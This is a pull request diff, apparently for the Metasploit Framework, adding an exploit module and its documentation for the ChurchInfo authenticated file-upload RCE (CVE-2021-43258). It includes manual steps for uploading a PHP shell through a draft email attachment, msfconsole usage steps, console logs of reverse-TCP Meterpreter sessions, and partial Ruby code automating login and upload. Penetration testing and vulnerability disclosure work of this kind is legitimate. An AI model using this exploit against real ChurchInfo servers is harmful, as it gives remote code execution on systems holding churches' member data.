### PR TITLE
Adding exploit for ChurchInfo 1.2.13-1.3.0 RCE (CVE-2021-43258)

### DIFF
--- a/documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
+++ b/documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
@@ -19,16 +19,15 @@ of writing and there is presently no known patch for this issue.
 ### Installation
 Installation guides are available on the SourceForge site at https://sourceforge.net/projects/churchinfo/files/.
 
-The following however is a quick and easy way to get most versions of churchinfo up and running using Docker,
+The following however is a quick and easy way to get most versions of ChurchInfo up and running using Docker,
 which should make it a lot easier to setup and also clean up once you are finished testing things out.
 
 1. `wget https://master.dl.sourceforge.net/project/churchinfo/churchinfo/1.3.0/churchinfo-1.3.0.tar.gz`
 1. `tar -xvf churchinfo-1.3.0.tar.gz`
 1. `sudo docker run -i -t -p "9090:80" -v ${PWD}/churchinfo:/app mattrayner/lamp:0.8.0-1804-php7`.
-1. Check the output. You should see something like this: `mysql -uadmin -punOFDEJCrm6K -h<host> -P<port>`
-1. `sudo docker ps -a` and find the container that was created and is running.
-1. `sudo docker exec -it 5f1861241f19 /bin/bash`
-1. Inside the new prompt: 
+1. `sudo docker ps -a` and find the container ID that was created and which is now running.
+1. `sudo docker exec -it *container ID* /bin/bash`
+1. Inside the new prompt:
 1. `mysqladmin -u root -p create churchinfo` and press the ENTER key when prompted for the password.
 1. `cd /app/churchinfo/SQL`
 1. `mysql -u root -p churchinfo < Install.sql` and press the ENTER key when prompted for the password.
@@ -36,13 +35,14 @@ which should make it a lot easier to setup and also clean up once you are finish
 1. `nano /app/churchinfo/Include/Config.php`.
 1. Set the `$sUSER` variable to `'root'`.
 1. Set the `$sPASSWORD` variable to `''`.
-1. Set the `$sRootPath` variable to `''`.
+1. Set the `$sRootPath` variable to `'/churchinfo'`. This should be default though.
 1. Set the `$URL[0]` to `http://localhost/churchinfo/Default.php`.
 1. Exit out of `nano` and run `/etc/init.d/apache2 restart`
-1. You should now be able to log in at `http://127.0.0.1:9090/churchinfo/Default.php` with the username `Admin` and password `churchinfoadmin`.
-1. This should cause the app to redirect to a password change form. 
+1. Log in at `http://127.0.0.1:9090/churchinfo/Default.php` with the username `Admin` and password `churchinfoadmin`.
+1. This should cause the app to redirect to a password change form.
 1. Specify the old password, aka `churchinfoadmin` and then specify the new password twice and submit the form.
-1. You should now be ready to test the module!
+1. Go to `http://127.0.0.1:9090/churchinfo/PersonEditor.php` and fill out the form with as much detail as possible.
+1. Click "Save and Add".
 
 ## Verification Steps
 This module requires authenticated access to the application. After identifying a vulnerable
@@ -50,36 +50,14 @@ ChurchInfo application, there MUST be a person entry available within the databa
 entries within the database, it will not be possible to create a draft email. This draft email
 will be used to place the malicious attachment into the `/tmp_attach` directory for our exploit.
 
-### Module Use
-The following steps outline how to use the module.
-1. Install the application and register an account.
-1. Create some person entries within the database, validate they populate at the page `/SelectList.php?mode=person`.
 1. Start `msfconsole`
 1. `use exploit/multi/http/churchinfo_upload_exec`
-1. Set the target `RHOST`, `APPBASE`, `username`, and `password` values.
+1. Set the target `RHOST`, `APPBASE`, `USERNAME`, and `PASSWORD` values.
+1. Optional: Set the target `RPORT` if the ChurchInfo server is running on a different port than port 80.
+1. Optional: `set SSL true` if the target is using SSL for ChurchInfo.
 1. Select the payload of choice or leave default.
 1. Set the `LHOST` to your system.
 1. Run the exploit with `run`, enjoy the shell!
-
-If exploit was successful, output should be something close to the following:
-
-```
-msf6 exploit(multi/http/churchinfo_upload_exec) > run
-
-[*] Started reverse TCP handler on 192.168.1.240:4444
-[+] Logged into application as admin
-[*] Navigating to add items to cart
-[+] Items in Cart: 3
-[+] Uploading exploit via Email temp email attachment
-[+] Exploit uploaded to /churchinfo/tmp_attach/FjuIxnXKe.php
-[!] Don't forget to clean up artifacts at /churchinfo/tmp_attach/FjuIxnXKe.php
-[*] Sending stage (39927 bytes) to 192.168.1.72
-[*] Meterpreter session 2 opened (192.168.1.240:4444 -> 192.168.1.72:37250) at 2022-11-12 21:38:30 -0500
-
-meterpreter > getuid
-
-Server username: www-data 
-```
 
 ## Options
 There are a handful of options which can be used to further configure the attack or other environmental uses.
@@ -109,36 +87,78 @@ set verbose true
 
 This will enable additional information and details about the exploit as it is launched.
 
-### ChurchInfo 1.3.0
-### ChurchInfo v1.3.0 with MySQL 5.7.40 on Ubuntu Linux 18.04.5 LTS
-There are several options available. This exploit requires authenticated access
-to the email application for ChurchInfo. The default username is `admin` and
-password is `churchinfoadmin` based on the installation documentation.
-Both `EMAIL_MESG` and `EMAIL_SUBJ` are required to upload the exploit, but
-do not have any affect on what type of exploit is launched. `TARGETURI` is
-the location the ChurchInfo application is installed.
-
+### ChurchInfo v1.3.0 with MySQL 5.7.35 on Ubuntu Linux 18.04.2 LTS (Docker Image)
 ```
-msf6 exploit(multi/http/churchinfo_upload_exec) > run
-                                                 
-[*] Started reverse TCP handler on 192.168.1.240:4444    
-[*] Gathering PHP session cookie                       
-[*] SSL is false, leaving protocol as HTTP           
-[+] PHP session cookie is PHPSESSID=19rjcc9tbmvj6tpbl7iql0lm0q;
-[*] Attempting login                                  
-[+] Location header is /churchinfo//CheckVersion.php
-[+] Logged into application as admin                  
-[*] Attempting exploit                                  
-[*] Navigating to add items to cart                  
-[+] Items in Cart: 3                              
-[+] Uploading exploit via temp email attachment            
-[*] Payload name is 0EXot.php                       
-[+] Exploit uploaded to /churchinfo/tmp_attach/0EXot.php
-[+] Executing payload with GET request                  
-[*] Sending stage (39927 bytes) to 192.168.1.72    
-[+] Deleted 0EXot.php                               
-[*] Meterpreter session 20 opened (192.168.1.240:4444 -> 192.168.1.72:37656) at 2022-11-18 06:31:30 -0500
+msf6 > use exploit/multi/http/churchinfo_upload_exec
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/churchinfo_upload_exec) > set RHOST 127.0.0.1
+RHOST => 127.0.0.1
+msf6 exploit(multi/http/churchinfo_upload_exec) > set RPORT 9090
+RPORT => 9090
+msf6 exploit(multi/http/churchinfo_upload_exec) > set PASSWORD testing123
+PASSWORD => testing123
+msf6 exploit(multi/http/churchinfo_upload_exec) > show options
 
-meterpreter > getuid                                   
+Module options (exploit/multi/http/churchinfo_upload_exec):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   EMAIL_MESG  Hello there!     yes       Email message in webapp
+   EMAIL_SUBJ  Read this now!   yes       Email subject in webapp
+   PASSWORD    testing123       yes       Password to login with
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT       9090             yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI   /churchinfo/     yes       The location of the ChurchInfo app
+   USERNAME    admin            yes       Username for ChurchInfo application
+   VHOST                        no        HTTP server virtual host
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.30.182.196   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Targeting
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(multi/http/churchinfo_upload_exec) > set LHOST docker0
+LHOST => docker0
+msf6 exploit(multi/http/churchinfo_upload_exec) > run
+
+[*] Started reverse TCP handler on 172.18.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Target is ChurchInfo!
+[+] The target is vulnerable. Target is running ChurchInfo 1.3.0!
+[+] Logged into application as admin
+[*] Navigating to add items to cart
+[+] Items in Cart: Items in Cart: 2
+[+] Uploading exploit via temp email attachment
+[+] Exploit uploaded to /churchinfo/tmp_attach/ueNYs9.php
+[+] Executing payload with GET request
+[*] Sending stage (39927 bytes) to 172.18.0.2
+[+] Deleted ueNYs9.php
+[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:37790) at 2022-11-18 17:44:31 -0600
+
+
+meterpreter > getpid
+Current pid: 452
+meterpreter > getuid
 Server username: www-data
+meterpreter > sysinfo
+Computer    : 8eeaa82293b4
+OS          : Linux 8eeaa82293b4 5.15.0-53-generic #59-Ubuntu SMP Mon Oct 17 18:53:30 UTC 2022 x86_64
+Meterpreter : php/linux
+meterpreter > 
 ```

--- a/documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
+++ b/documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
@@ -17,8 +17,32 @@ This vulnerability was assigned CVE-2021-43258. Version 1.3.0 was the latest ver
 of writing and there is presently no known patch for this issue.
 
 ### Installation
-Installation guides are available on the SourceForge site at https://sourceforge.net/projects/churchinfo/files/
-and within the zip file downloaded in the `./Documentation` folder. This is a standard PHP and MySQL website.
+Installation guides are available on the SourceForge site at https://sourceforge.net/projects/churchinfo/files/.
+
+The following however is a quick and easy way to get most versions of churchinfo up and running using Docker,
+which should make it a lot easier to setup and also clean up once you are finished testing things out.
+
+1. `wget https://master.dl.sourceforge.net/project/churchinfo/churchinfo/1.3.0/churchinfo-1.3.0.tar.gz`
+1. `tar -xvf churchinfo-1.3.0.tar.gz`
+1. `sudo docker run -i -t -p "9090:80" -v ${PWD}/churchinfo:/app mattrayner/lamp:0.8.0-1804-php7`.
+1. Check the output. You should see something like this: `mysql -uadmin -punOFDEJCrm6K -h<host> -P<port>`
+1. `sudo docker ps -a` and find the container that was created and is running.
+1. `sudo docker exec -it 5f1861241f19 /bin/bash`
+1. Inside the new prompt: 
+1. `mysqladmin -u root -p create churchinfo` and press the ENTER key when prompted for the password.
+1. `cd /app/churchinfo/SQL`
+1. `mysql -u root -p churchinfo < Install.sql` and press the ENTER key when prompted for the password.
+1. `apt-get install nano` if you want to use Nano.
+1. `nano /app/churchinfo/Include/Config.php`.
+1. Set the `$sUSER` variable to `'root'`.
+1. Set the `$sPASSWORD` variable to `''`.
+1. Set the `$sRootPath` variable to `''`.
+1. Set the `$URL[0]` to `http://localhost/churchinfo/Default.php`.
+1. Exit out of `nano` and run `/etc/init.d/apache2 restart`
+1. You should now be able to log in at `http://127.0.0.1:9090/churchinfo/Default.php` with the username `Admin` and password `churchinfoadmin`.
+1. This should cause the app to redirect to a password change form. 
+1. Specify the old password, aka `churchinfoadmin` and then specify the new password twice and submit the form.
+1. You should now be ready to test the module!
 
 ## Verification Steps
 This module requires authenticated access to the application. After identifying a vulnerable

--- a/documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
+++ b/documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
@@ -1,29 +1,40 @@
-ChurchInfo is a PHP application used to help Churches manage systems and users as an opensource project. There are various vulnerabilities in the ChurchInfo 1.3.0 software which can be exploited by an attacker, this module targets an authenticated remote code execution (RCE) vulnerability.
+## Vulnerable Application
+* Project Homepage: http://www.churchdb.org/
+* Project Download: https://sourceforge.net/projects/churchinfo/files/
 
-ChurchInfo 1.3.0 has functionality to email users from the database with attachments. When preparing the email, the attachment draft is saved in the `/churchinfo/tmp_attach/` folder. Before the email is sent, the file put into the attachment can be loaded in the application. RCE exists when uploading malicious PHP as an attachment.
+ChurchInfo is an open source PHP application used to help churches manage systems and users of the church.
+There are various vulnerabilities in the ChurchInfo 1.3.0 software which can be exploited by an
+attacker, however this module targets an authenticated remote code execution (RCE) vulnerability
+known as CVE-2021-43258 to execute code as the web daemon user (e.g. www-data).
+
+ChurchInfo 1.3.0 contains functionality to email users listed in the ChurchInfo database
+with attachments. When preparing the email, a draft of the attachment is saved into
+`/tmp_attach/`, which is a web accessible folder under the ChurchInfo web root. Before the email is sent,
+the attachment draft can be loaded in the application. By uploading a malicious PHP file
+as an attachment and then browsing to it on the web server, RCE can be achieved.
 
 This vulnerability was assigned CVE-2021-43258.
 
-## Vulnerable Application
-
-* Project Homepage: http://www.churchdb.org/
-* Project Download: https://sourceforge.net/projects/churchinfo/files/
-* Google Dork: `intitle:"ChurchInfo: Login"`
-
-Installation guides are available on the SourceForge site and within the zip file downloaded in the `./Documentation` folder. This is a standard PHP and MySQL website.
+### Installation
+Installation guides are available on the SourceForge site at https://sourceforge.net/projects/churchinfo/files/
+and within the zip file downloaded in the `./Documentation` folder. This is a standard PHP and MySQL website.
 
 ## Verification Steps
-This module requires authenticated access to the application. After identifying a vulnerable ChurchInfo application, there MUST be persons available within the database. If there are no persons, a draft email cannot be made which is used to place the malicious attachment into the `/tmp_attach` directory for our exploit.
+This module requires authenticated access to the application. After identifying a vulnerable
+ChurchInfo application, there MUST be a person entry available within the database. If there are no person
+entries within the database, it will not be possible to create a draft email. This draft email
+will be used to place the malicious attachment into the `/tmp_attach` directory for our exploit.
 
 ### Module Use
 The following steps outline how to use the module.
 1. Install the application and register an account.
-2. Create some persons within the database, validate they populate at the page `/SelectList.php?mode=person`.
-3. Within `msfconsole`, use the `exploits/multi/http/churchinfo_upload_exec` module.
-4. Set the target `RHOST`, `APPBASE`, `username`, and `password` values. 
-5. Select the payload of choice or leave default.
-6. Set the `LHOST` to your system.
-7. Run the exploit with `run`, enjoy the shell!
+1. Create some person entries within the database, validate they populate at the page `/SelectList.php?mode=person`.
+1. Start `msfconsole`
+1. `use exploit/multi/http/churchinfo_upload_exec`
+1. Set the target `RHOST`, `APPBASE`, `username`, and `password` values.
+1. Select the payload of choice or leave default.
+1. Set the `LHOST` to your system.
+1. Run the exploit with `run`, enjoy the shell!
 
 If exploit was successful, output should be something close to the following:
 
@@ -40,74 +51,64 @@ msf6 exploit(multi/http/churchinfo_upload_exec) > run
 [*] Sending stage (39927 bytes) to 192.168.1.72
 [*] Meterpreter session 2 opened (192.168.1.240:4444 -> 192.168.1.72:37250) at 2022-11-12 21:38:30 -0500
 
-meterpreter >
+meterpreter >getuid
+
+Server username: www-data 
 ```
-
-### Manual Exploitation
-The following steps outline how to manually exploit the vulnerability.
-1. Log into the ChurchInfo application 
-2. Browse to the `SelectList.php` page and click the "Add to Cart" button
-3. Browse to `CartView.php` and click "Compose Email"
-4. Attach a PHP shell as the "attach file", place anything in the subject and message, click "Save Email"
-5. Navigate to `http://127.0.0.1/churchinfo/tmp_attach/exploit.php?cmd=pwd`
-6. Any PHP code is executed
-
 
 ## Options
 There are a handful of options which can be used to further configure the attack or other environmental uses.
 
-
 ### USERNAME
-
-The username of a valid user account for the ChurchInfo application.
+The username of a valid user account for the ChurchInfo application. Default is `admin`.
 
 ### PASSWORD
-
-The password for a valid user account for the ChurchInfo application.
+The password for a valid user account for the ChurchInfo application. Default is `churchinfoadmin` based on documentation.
 
 ### APPBASE
-
-The base directory path to the ChurchInfo application. This can and will likely vary depending on how the application was installed. Default value is `/churchinfo/`.
+The base directory path to the ChurchInfo application. This can and will likely
+vary depending on how the application was installed. Default value is `/churchinfo/`.
 
 ### EMAIL_SUBJ
-
 The subject of the draft email used for the exploit, the email is not sent. Default value is `Exploit Subj`.
 
 ### EMAIL_MESG
-
 The message on the draft email which is used for the exploit. The email is not sent. Default value is `Here's a lovely message`.
 
 ## Scenarios
-If there are no persons in the database, the exploit will fail. To help troubleshoot, enable verbose mode with the following:
+If there are no person entries in the database, the exploit will fail. To help troubleshoot, enable verbose mode with the following:
 
 ```
 set verbose true
 ```
-This will enable additional information and details about the exploit as it is launched. Verbose output will appear as similar to below:
+
+This will enable additional information and details about the exploit as it is launched.
+
+### ChurchInfo 1.3.0
+### ChurchInfo v1.3.0 with MySQL 5.7.40 on Ubuntu Linux 18.04.5 LTS
+There are several options available. This exploit requires authenticated access to the email application for ChurchInfo. The default username is `admin` and password is `churchinfoadmin` based on the installation documentation. Both `EMAIL_MESG` and `EMAIL_SUBJ` are required to upload the exploit, but do not have any affect on what type of exploit is launched. `TARGETURI` is the location the ChurchInfo application is installed.
 
 ```
 msf6 exploit(multi/http/churchinfo_upload_exec) > run
+                                                 
+[*] Started reverse TCP handler on 192.168.1.240:4444    
+[*] Gathering PHP session cookie                       
+[*] SSL is false, leaving protocol as HTTP           
+[+] PHP session cookie is PHPSESSID=19rjcc9tbmvj6tpbl7iql0lm0q;
+[*] Attempting login                                  
+[+] Location header is /churchinfo//CheckVersion.php
+[+] Logged into application as admin                  
+[*] Attempting exploit                                  
+[*] Navigating to add items to cart                  
+[+] Items in Cart: 3                              
+[+] Uploading exploit via temp email attachment            
+[*] Payload name is 0EXot.php                       
+[+] Exploit uploaded to /churchinfo/tmp_attach/0EXot.php
+[+] Executing payload with GET request                  
+[*] Sending stage (39927 bytes) to 192.168.1.72    
+[+] Deleted 0EXot.php                               
+[*] Meterpreter session 20 opened (192.168.1.240:4444 -> 192.168.1.72:37656) at 2022-11-18 06:31:30 -0500
 
-[*] Started reverse TCP handler on 192.168.1.240:4444
-[*] Gathering PHP session cookie
-[*] SSL is false, leaving Proto parameter as http
-[*] Login page is /churchinfo/Default.php?Proto=http&Path=192.168.1.72:80%2F/churchinfo/
-[+] PHP session cookie is PHPSESSID=nq9q5dod5ggauohv5ob6j4s40e;
-[*] Attempting login
-[+] Logged into application as admin
-[*] Attempting exploit
-[*] Navigating to add items to cart
-[+] Items in Cart: 3
-[+] Uploading exploit via Email temp email attachment
-[*] Payload name is GhVRHMKRJT.php
-[*] Payload added to post_data
-[*] Subject added to post_data
-[*] emailmessage added to post_data
-[*] submit added to post_data
-[+] Exploit uploaded to /churchinfo/tmp_attach/GhVRHMKRJT.php
-[!] Don't forget to clean up artifacts at /churchinfo/tmp_attach/GhVRHMKRJT.php
-[*] Sending stage (39927 bytes) to 192.168.1.72
-[*] Meterpreter session 3 opened (192.168.1.240:4444 -> 192.168.1.72:37252) at 2022-11-12 21:56:37 -0500
-
-meterpreter >
+meterpreter > getuid                                   
+Server username: www-data
 ```

--- a/documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
+++ b/documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
@@ -3,17 +3,18 @@
 * Project Download: https://sourceforge.net/projects/churchinfo/files/
 
 ChurchInfo is an open source PHP application used to help churches manage systems and users of the church.
-There are various vulnerabilities in the ChurchInfo 1.3.0 software which can be exploited by an
+There are various vulnerabilities in the ChurchInfo software which can be exploited by an
 attacker, however this module targets an authenticated remote code execution (RCE) vulnerability
 known as CVE-2021-43258 to execute code as the web daemon user (e.g. www-data).
 
-ChurchInfo 1.3.0 contains functionality to email users listed in the ChurchInfo database
+ChurchInfo v1.2.13, v1.2.14, and v1.3.0 contain functionality to email users listed in the ChurchInfo database
 with attachments. When preparing the email, a draft of the attachment is saved into
 `/tmp_attach/`, which is a web accessible folder under the ChurchInfo web root. Before the email is sent,
 the attachment draft can be loaded in the application. By uploading a malicious PHP file
 as an attachment and then browsing to it on the web server, RCE can be achieved.
 
-This vulnerability was assigned CVE-2021-43258.
+This vulnerability was assigned CVE-2021-43258. Version 1.3.0 was the latest version of ChurchInfo at the time
+of writing and there is presently no known patch for this issue.
 
 ### Installation
 Installation guides are available on the SourceForge site at https://sourceforge.net/projects/churchinfo/files/
@@ -51,7 +52,7 @@ msf6 exploit(multi/http/churchinfo_upload_exec) > run
 [*] Sending stage (39927 bytes) to 192.168.1.72
 [*] Meterpreter session 2 opened (192.168.1.240:4444 -> 192.168.1.72:37250) at 2022-11-12 21:38:30 -0500
 
-meterpreter >getuid
+meterpreter > getuid
 
 Server username: www-data 
 ```
@@ -70,10 +71,10 @@ The base directory path to the ChurchInfo application. This can and will likely
 vary depending on how the application was installed. Default value is `/churchinfo/`.
 
 ### EMAIL_SUBJ
-The subject of the draft email used for the exploit, the email is not sent. Default value is `Exploit Subj`.
+The subject of the draft email used for the exploit, the email is not sent. Default value is `Read this now!`.
 
 ### EMAIL_MESG
-The message on the draft email which is used for the exploit. The email is not sent. Default value is `Here's a lovely message`.
+The message on the draft email which is used for the exploit. The email is not sent. Default value is `Hello there!`.
 
 ## Scenarios
 If there are no person entries in the database, the exploit will fail. To help troubleshoot, enable verbose mode with the following:
@@ -86,7 +87,12 @@ This will enable additional information and details about the exploit as it is l
 
 ### ChurchInfo 1.3.0
 ### ChurchInfo v1.3.0 with MySQL 5.7.40 on Ubuntu Linux 18.04.5 LTS
-There are several options available. This exploit requires authenticated access to the email application for ChurchInfo. The default username is `admin` and password is `churchinfoadmin` based on the installation documentation. Both `EMAIL_MESG` and `EMAIL_SUBJ` are required to upload the exploit, but do not have any affect on what type of exploit is launched. `TARGETURI` is the location the ChurchInfo application is installed.
+There are several options available. This exploit requires authenticated access
+to the email application for ChurchInfo. The default username is `admin` and
+password is `churchinfoadmin` based on the installation documentation.
+Both `EMAIL_MESG` and `EMAIL_SUBJ` are required to upload the exploit, but
+do not have any affect on what type of exploit is launched. `TARGETURI` is
+the location the ChurchInfo application is installed.
 
 ```
 msf6 exploit(multi/http/churchinfo_upload_exec) > run

--- a/documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
+++ b/documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
@@ -1,0 +1,113 @@
+ChurchInfo is a PHP application used to help Churches manage systems and users as an opensource project. There are various vulnerabilities in the ChurchInfo 1.3.0 software which can be exploited by an attacker, this module targets an authenticated remote code execution (RCE) vulnerability.
+
+ChurchInfo 1.3.0 has functionality to email users from the database with attachments. When preparing the email, the attachment draft is saved in the `/churchinfo/tmp_attach/` folder. Before the email is sent, the file put into the attachment can be loaded in the application. RCE exists when uploading malicious PHP as an attachment.
+
+This vulnerability was assigned CVE-2021-43258.
+
+## Vulnerable Application
+
+* Project Homepage: http://www.churchdb.org/
+* Project Download: https://sourceforge.net/projects/churchinfo/files/
+* Google Dork: `intitle:"ChurchInfo: Login"`
+
+Installation guides are available on the SourceForge site and within the zip file downloaded in the `./Documentation` folder. This is a standard PHP and MySQL website.
+
+## Verification Steps
+This module requires authenticated access to the application. After identifying a vulnerable ChurchInfo application, there MUST be persons available within the database. If there are no persons, a draft email cannot be made which is used to place the malicious attachment into the `/tmp_attach` directory for our exploit.
+
+### Module Use
+The following steps outline how to use the module.
+1. Install the application and register an account.
+2. Create some persons within the database, validate they populate at the page `/SelectList.php?mode=person`.
+3. Within `msfconsole`, use the `exploits/multi/http/churchinfo_upload_exec` module.
+4. Set the target `RHOST`, `APPBASE`, `username`, and `password` values. 
+5. Select the payload of choice or leave default.
+6. Set the `LHOST` to your system.
+7. Run the exploit with `run`, enjoy the shell!
+
+If exploit was successful, output should be something close to the following:
+
+```
+msf6 exploit(multi/http/churchinfo_upload_exec) > run
+
+[*] Started reverse TCP handler on 192.168.1.240:4444
+[+] Logged into application as admin
+[*] Navigating to add items to cart
+[+] Items in Cart: 3
+[+] Uploading exploit via Email temp email attachment
+[+] Exploit uploaded to /churchinfo/tmp_attach/FjuIxnXKe.php
+[!] Don't forget to clean up artifacts at /churchinfo/tmp_attach/FjuIxnXKe.php
+[*] Sending stage (39927 bytes) to 192.168.1.72
+[*] Meterpreter session 2 opened (192.168.1.240:4444 -> 192.168.1.72:37250) at 2022-11-12 21:38:30 -0500
+
+meterpreter >
+```
+
+### Manual Exploitation
+The following steps outline how to manually exploit the vulnerability.
+1. Log into the ChurchInfo application 
+2. Browse to the `SelectList.php` page and click the "Add to Cart" button
+3. Browse to `CartView.php` and click "Compose Email"
+4. Attach a PHP shell as the "attach file", place anything in the subject and message, click "Save Email"
+5. Navigate to `http://127.0.0.1/churchinfo/tmp_attach/exploit.php?cmd=pwd`
+6. Any PHP code is executed
+
+
+## Options
+There are a handful of options which can be used to further configure the attack or other environmental uses.
+
+
+### USERNAME
+
+The username of a valid user account for the ChurchInfo application.
+
+### PASSWORD
+
+The password for a valid user account for the ChurchInfo application.
+
+### APPBASE
+
+The base directory path to the ChurchInfo application. This can and will likely vary depending on how the application was installed. Default value is `/churchinfo/`.
+
+### EMAIL_SUBJ
+
+The subject of the draft email used for the exploit, the email is not sent. Default value is `Exploit Subj`.
+
+### EMAIL_MESG
+
+The message on the draft email which is used for the exploit. The email is not sent. Default value is `Here's a lovely message`.
+
+## Scenarios
+If there are no persons in the database, the exploit will fail. To help troubleshoot, enable verbose mode with the following:
+
+```
+set verbose true
+```
+This will enable additional information and details about the exploit as it is launched. Verbose output will appear as similar to below:
+
+```
+msf6 exploit(multi/http/churchinfo_upload_exec) > run
+
+[*] Started reverse TCP handler on 192.168.1.240:4444
+[*] Gathering PHP session cookie
+[*] SSL is false, leaving Proto parameter as http
+[*] Login page is /churchinfo/Default.php?Proto=http&Path=192.168.1.72:80%2F/churchinfo/
+[+] PHP session cookie is PHPSESSID=nq9q5dod5ggauohv5ob6j4s40e;
+[*] Attempting login
+[+] Logged into application as admin
+[*] Attempting exploit
+[*] Navigating to add items to cart
+[+] Items in Cart: 3
+[+] Uploading exploit via Email temp email attachment
+[*] Payload name is GhVRHMKRJT.php
+[*] Payload added to post_data
+[*] Subject added to post_data
+[*] emailmessage added to post_data
+[*] submit added to post_data
+[+] Exploit uploaded to /churchinfo/tmp_attach/GhVRHMKRJT.php
+[!] Don't forget to clean up artifacts at /churchinfo/tmp_attach/GhVRHMKRJT.php
+[*] Sending stage (39927 bytes) to 192.168.1.72
+[*] Meterpreter session 3 opened (192.168.1.240:4444 -> 192.168.1.72:37252) at 2022-11-12 21:56:37 -0500
+
+meterpreter >
+```

--- a/modules/exploits/multi/http/churchinfo_upload_exec.rb
+++ b/modules/exploits/multi/http/churchinfo_upload_exec.rb
@@ -13,12 +13,13 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'ChurchInfo v.1.3.0 Authenticated RCE Exploit CVE-2021-43258',
+        'Name' => 'ChurchInfo v.1.3.0 Authenticated RCE',
         'Description' => %q{
-          This module exploits the email attachment upload staging from the CartView.php page. Uploading
-          a file as an attachment places it in the /tmp_attach/ folder before its submitted and can be
-          interpreted as PHP code by the server. This requires authentication to the application. This
-          vulnerability is assigned CVE-2021-43258.
+          This module exploits the logic in the CartView.php page when crafting a draft email with an attachment.
+          By uploading an attachment for a draft email, the attachment will be placed in the /tmp_attach/ folder of the
+          ChurchInfo web server, which is accessible over the web by any user. By uploading a PHP attachment and
+          then browsing to the location of the uploaded PHP file on the web server, arbitrary code
+          execution as the web daemon user (e.g. www-data) can be achieved.
         },
         'License' => MSF_LICENSE,
         'Author' => [ 'm4lwhere <m4lwhere@protonmail.com>' ],
@@ -31,15 +32,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'Privileged' => false,
         'Arch' => ARCH_PHP,
         'Targets' => [['Automatic Targeting', { 'auto' => true }]],
-        'DisclosureDate' => '2021-10-30',
+        'DisclosureDate' => '2021-10-30', # Reported to ChurchInfo developers on this date
         'DefaultTarget' => 0,
-        'Compat' => {
-          'Meterpreter' => {
-            'Commands' => %w[
-              stdapi_fs_delete_file
-            ]
-          }
-        },
         'Notes' => {
           'Stability' => ['CRASH_SAFE'],
           'Reliability' => ['REPEATABLE_SESSION'],
@@ -54,34 +48,40 @@ class MetasploitModule < Msf::Exploit::Remote
         OptString.new('USERNAME', [true, 'Username for ChurchInfo application', 'admin']),
         OptString.new('PASSWORD', [true, 'Password to login with', 'churchinfoadmin']),
         OptString.new('TARGETURI', [true, 'The location of the ChurchInfo app', '/churchinfo/']),
-        OptString.new('EMAIL_SUBJ', [true, 'Email subject in webapp', 'Exploit Subj']),
-        OptString.new('EMAIL_MESG', [true, 'Email message in webapp', 'Here\'s a lovely message'])
+        OptString.new('EMAIL_SUBJ', [true, 'Email subject in webapp', 'Read this now!']),
+        OptString.new('EMAIL_MESG', [true, 'Email message in webapp', 'Hello there!'])
       ]
     )
-
-    self.needs_cleanup = true
   end
 
   #
   # The exploit method attempts a login, adds items to the cart, then creates the email attachment.
   # Adding items to the cart is required for the server-side code to accept the upload.
   #
-
   def exploit
-    # Need to gather cookie value first to pass to application
+    # Need to grab the PHP session cookie value first to pass to application
     vprint_status('Gathering PHP session cookie')
     if datastore['SSL'] == true
-      vprint_status('SSL is true, changing Proto parameter in URL')
-      login_page = datastore['APPBASE'] + 'Default.php?Proto=https&Path=' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '%2F' + datastore['APPBASE']
+      vprint_status('SSL is true, changing protocol to HTTPS')
+      proto_var = 'https'
     else
-      vprint_status('SSL is false, leaving Proto parameter as http')
-      login_page = datastore['APPBASE'] + 'Default.php?Proto=http&Path=' + datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + '%2F' + datastore['APPBASE']
+      vprint_status('SSL is false, leaving protocol as HTTP')
+      proto_var = 'http'
     end
-    vprint_status("Login page is #{login_page}")
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, login_page),
-      'method' => 'GET'
+      'uri' => normalize_uri(target_uri.path, 'Default.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'Proto' => proto_var,
+        'Path' => datastore['RHOSTS'] + ':' + datastore['RPORT'].to_s + datastore['TARGETURI']
+      },
+      'keep_cookies' => true
     )
+
+    # Ensure we get a 200 from the application login page
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, "#{peer} - Unable to reach the ChurchInfo login page (response code: #{res.code})")
+    end
 
     # Grab our assigned session cookie
     cookie = res.get_cookies
@@ -90,93 +90,85 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Attempt a login with the cookie assigned, server will assign privs on server-side if authenticated
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, login_page),
+      'uri' => normalize_uri(target_uri.path, 'Default.php'),
       'method' => 'POST',
-      'cookie' => cookie,
       'vars_post' => {
         'User' => datastore['USERNAME'],
         'Password' => datastore['PASSWORD'],
-        'sURLPath' => login_page
+        'sURLPath' => datastore['TARGETURI']
       }
     )
 
-    # a valid login will give us a 302 redirect to CheckVersion.php so check that.
-    unless res && res.code == 302
